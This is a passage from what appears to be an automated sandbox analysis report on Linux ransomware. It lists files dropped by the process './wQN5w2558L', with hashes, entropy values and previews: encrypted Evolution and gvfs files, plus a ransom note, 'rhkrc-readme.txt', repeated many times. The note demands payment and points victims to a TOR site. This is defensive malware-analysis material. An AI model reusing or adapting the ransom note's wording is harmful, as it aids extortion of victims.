                  Preview: LW.h.|.e.....@..U>.U=....Y..L.QO..p....u^..*..O+..+...S..:X.>.1x.Sb.H.O.C-..........*.u..*.....r.Q(..........j..Zz@w.e...;..6..!.........T.*............H...J..d.......lR..f:..Ph`...b.I....pw....m.Q.S.}t..jX..[..y.3.........8.k.K.]U..$.ek...^.6....A.0..=...GA.C.!u..!.....E..,/f@:.D..............E..GlT..@...E.....G.....Z...*r.O..x.o.K.3...{..bA(\..]..o..:$.<.M....A..##gN.......P..}.......eg....`C..<RP..]\....5.!5q..9..|.5n....O....K#q.T..P...!..f...........~..+......u.h....Q.r.*"J9....g...._b..0.6L........~.X....D..rG.KY...._\....@..L.z.e.1.b.<m.....]k..m/PP.u4|.^.2Si..?Tl^#<. .h4.k!.Z.....H.BKT....,......&.h.....*.5.........#vp..ma...y.EJc....XK.<...M .E.....v....^.\.YC."K=.....(.I.w.H..g..).#r.....l..G....v\.i....j=..nT.w^.s.....=<.SHZ,.c.....$...N..~....5]..S..[.....Dj.~.....[......)I..WD.......2.....O..E....3..;...K.k.4.]...&.."]M.....+.++.E.Y...qG.......9.e.M.x+.0.r.<.i.>.jFN..p.3.........2....e.s.e ...!.%K.\.5M....+p..vh.3^V.....'...>.-........pQ...Fo..pV...v*=....v`Yr...u.........
                  /home/user/.local/share/evolution/addressbook/system/photos/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.local/share/evolution/addressbook/system/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.local/share/evolution/addressbook/trash/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.local/share/evolution/calendar/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.local/share/evolution/calendar/system/calendar.ics
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):405
                  Entropy (8bit):6.295953547319343
                  Encrypted:false
                  SSDEEP:6:QN+wf/cYyv7CYEETfy+7v8e4Kox1zmhOO/EUyp6XcHXTyr4kLW:QNzSiwfy+oN2DcUBEXLR
                  MD5:0E4195EA52F5C72D15AD0DEA7709D5D2
                  SHA1:AFF2F15C62AE80FBC1ABEAAD5DF6EB95030EACC9
                  SHA-256:5FE939C658C46966BDA4434AB11390E8872E691E7CED77426C16EC263BAF61F7
                  SHA-512:56DF038701993EC6FE57250CF5835254E0FF5CB1ED7E877D81D470A6734076E8EDEF650798279861A8A63A1661EFAF6F819D358BD5A12AC83F27A12954A3DF4A
                  Malicious:false
                  Reputation:low
                  Preview: ~@p..Y.....x.!&...9.I..Txj..O....&..!.p.....8.+e.2.FF.Dz...].../V.6.`S..S...*.....u.......*.o>.4.>............W.Ge.r...I..............D...w..eLB..Z.h..b......H.....~Qs]...q.%;E.pa[..Z..oq.>.j.z........2m...j...h%&.!....R.G..7.ah...XW......8...,i..cp..,.v.V5._yp........................................................................................Yi6.vQ0..*!.C..P"P..r.......6...... .[...p2X........I.I.
                  /home/user/.local/share/evolution/calendar/system/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.local/share/evolution/calendar/trash/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.local/share/evolution/mail/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.local/share/evolution/mail/trash/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.local/share/evolution/memos/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.local/share/evolution/memos/trash/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.local/share/evolution/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.local/share/evolution/tasks/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.local/share/evolution/tasks/system/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.local/share/evolution/tasks/system/tasks.ics
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):405
                  Entropy (8bit):6.341478622409329
                  Encrypted:false
                  SSDEEP:6:P9Lck4yrOtQEjzRqhIIhX0FqEFkGly6li6Ng+1zmhOO/EUyp6Xcq/g0g+:lQUrOZZwXedy68a2DcUBfxg+
                  MD5:B1768E71BBCE45D4BECC2E1EB3A55DAE
                  SHA1:5C47377893FD1B7823970E112CDCA4505A158859
                  SHA-256:BFD0A8501586F97D0D1F497C19908495311799DF8C2EB3E2DE17C025994FAD63
                  SHA-512:0E0FA18A945075660B77840079A416B4FD029D1FA224D383DAA58FE7A33872DD7D3A0A551A7F834F4E10900CCA52BA09F8DDA54B8A26A540B22CD002DB44D778
                  Malicious:false
                  Reputation:low
                  Preview: )..5.C..QpBB..&...I....5+5z..+........f....m0.E6.5t.z#...E.}.v........g.V.$.C........w....$U...9u'...........k)TT.....^..52,...K..<c|..,.T...:#1S.....y....I..hZW......n...+.%;E.pa[..Z..oq.>.j.z........2m...j...h%&.!....R.G..7.ah...XW......8...,i..cp..,.v.V5._yp........................................................................................i1..r..'}.5.............T.l.fR......9>..Q.............4.
                  /home/user/.local/share/evolution/tasks/trash/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.local/share/gvfs-metadata/home
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):296
                  Entropy (8bit):5.6047725101842705
                  Encrypted:false
                  SSDEEP:6:WyUNXthDgGNAhU1zmhOO/EUyp6XcJe/pIaWgRWKtl8Nn:xUNELhI2DcUB1/pIpjKMNn
                  MD5:23F8CF9A974B04A55737298C711EDF82
                  SHA1:91E58C6D3DF2C8D4E6EA86278DF2F95DDB99EAA6
                  SHA-256:7D6FC81FBB6EB613F80512B0E43E1350B425A4A4AE44B2FF6BF3380D1A8A4727
                  SHA-512:F2C4A5DEDC40339321DE675BBD1BFFD18F2B4366E0D452008A26BA328BEF76773E6CDFB362622CC04634110D00C0E4F4C7F112B48A8D44BBE347CBA1A97D6785
                  Malicious:false
                  Reputation:low
                  Preview: .w..*..x..&wK...+.7_.n.S..)........y....(.....R....5...^..dd...`%;E.pa[..Z..oq.>.j.z........2m...j...h%&.!....R.G..7.ah...XW......8...,i..cp..,.v.V5._yp........................................................................................=.d.....2#.W..Y.5f3?^I.,w...o..X..HF.Z.@..c............(
                  /home/user/.local/share/gvfs-metadata/home-02b035a1.log
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):33000
                  Entropy (8bit):7.9938720653429405
                  Encrypted:true
                  SSDEEP:768:0k90eNiMgsLi99zZH11DavTyu5Yc2GtW5tvzxmeJxavM:d0eNigyzZ3IV24W5tvzxlJAk
                  MD5:991BA507D6D68841646458F0B1833A8C
                  SHA1:74448C3613140266B7FE306122BD2442FF4D2FD3
                  SHA-256:506A153B0375A66E5EBC51AFC44CA377C300404872AF88210F9A446561F4C32B
                  SHA-512:352955E5A7C1D539EA1D1B19C70EAF66B89765B9906BE0EF0121D008F2DC345C62354E8D71B0321782167E5C219965DFF3E0611F524FC2FA8BD51BDBFB080023
                  Malicious:false
                  Reputation:low
                  Preview: .&.7t...3..f...i@.......O....,"...Rl/:o..._&.:s...p3.*....................<.(.....f^.sLkI..^zWD.E.q.udY^..B...W.*8 z.&C=........6.=AZm9..k\z...P...w..9V.4E.;.........%.>.4.iA..L d../...}.huB.1............r+R.^.H.e.*.q.).e.<.._.Rif.......!.....i..Z].%+.....4h.f}g%py..h.p..?z..............;I., ...~`Gug....."..L.....U.;...e...'.p:#....\.=f...B.,FXe.7{kF..)|.|u...n...}!.&.V=.x.....V...t.:.....=.i..'.......^p.X....b5..&E...6..J...A.EL....;g.S\.P......]..P.k.Y...#" ...o.0.<i..A.9...W....58..LI..F...Q.^m..09!...N.Z*......<n..g........\.r ........t..k|......#.b..75%.....\.dRk....B.6T.......c...ax.+4XK.._.......n...Q^...*...'..#>7...U..f.`4..{..q8.J.`.oQF=.dy.....:/...}4...\...K.8.h.D:.........yN.1.m...u.k.s.Q..\...[h..C+.eW#...r...om....K..G......s..[.#.35?..."3....o.._..e..6..s....t.E{>=K..9.N....h%6$.A......~(:m..n..a..H...+0t$O. ...lAP}..7J...h!3>f.[.".&}.)c...bfG.zM...R.....n.......oP....[.....<....q._..<.N.]L;.....G.........z..V...........|..8.....1.U.V.F\.}.Zo.....*..5.3.....Z}........G.
                  /home/user/.local/share/gvfs-metadata/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
